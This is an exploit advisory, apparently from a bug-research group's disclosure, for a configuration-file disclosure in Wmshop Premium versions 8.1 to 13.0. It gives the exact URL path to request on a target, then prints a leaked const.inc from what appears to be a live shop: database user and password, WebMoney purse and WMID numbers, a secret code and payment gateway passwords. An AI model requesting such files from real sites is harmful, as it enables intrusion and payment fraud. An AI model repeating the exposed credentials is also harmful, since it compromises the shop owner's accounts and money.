Wmshop Premium versions 8.1, 12.0, and 13.0 suffer from a database configuration disclosure vulnerability.
1c6f8d36ee0db9125d251d6b4b76c53cb8e69ff8d38f2279852c7a88bc6595b5
< ------------------- header data start ------------------- >
### Cyber-Warrior & Security TIM - Bug Researchers Group ###
# Application Name : Wmshop Premium v.8.1 - 12.0 - 13.0
# Vulnerable Type : Arbitrary Database Config Disclosure Vulnerability
# Infection : SQL Info Get...
# Author : Septemb0x
# Script Down.& WebSite : http://s2.dosya.tc/wmshop_12.rar.html - http://s2.dosya.tc/wmshop_8.1_premium.rar.html - http://s2.dosya.tc/wmshop_13.zip.html
- https://merchant.webmoney.ru/conf/purses.asp
### Cyber-Warrior & Security TIM - Bug Researchers Group ###
< ------------------- header data end of ------------------- >
< -- bug code start -- >
EXPLOIT :
http://[target]/[path]/const.inc
GET TO;
<?
$serv_const_name="Wmshop Premium v.8.1";
$serv_const_embox="admin@ukrzona.com";
$serv_const_title="Wmshop Premium - Èíòåðíåò ìàãàçèí ñ äîñòàâêîé òîâàðà";
$serv_const_servname="mobil-fun.org";
$serv_const_lstcount="15";
$serv_const_commission="0.1";
$serv_const_priz="0.01";
$serv_const_shopwmz="Z520778207115";
$serv_const_shopwmr="R978996871794";
$serv_const_shopwme="E029838820099";
$serv_const_kurs_wmr="29.99";
$serv_const_kurs_wme="0.84";
$serv_const_shopwmid="223567673355";
$serv_const_secretcod_wmid="123456789";
$serv_const_robo_login="wmshop";
$serv_const_robo_pwd1="71svD6GvD";
$serv_const_robo_pwd2="p1xvG4";
$DB_NAME="extrimeal_wmshop";
$DB_USER="extrimeal_shop";
$DB_PASS="19010135";
$HOST="localhost";
$serv_const_ICQ="304080282";
$serv_const_exchange="smarket100";
$serv_const_screen="3";
$serv_const_screen_width="640";
$serv_const_screen_height="480";
$serv_const_screen_disk="100";
$serv_const_bold="1";
$serv_const_u="2";
$serv_const_block="2";
$serv_const_curl="";
?>
< -- bug code end of -- >
# Greetz : BHDR & BARCOD3 & Cem & Asil Bey And All Friends...
_________________________________________________________________
Windows Live ile fotoðraflarýnýzý organize edebilir, düzenleyebilir ve paylaþabilirsiniz.
http://www.microsoft.com/turkiye/windows/windowslive/products/photo-gallery-edit.aspx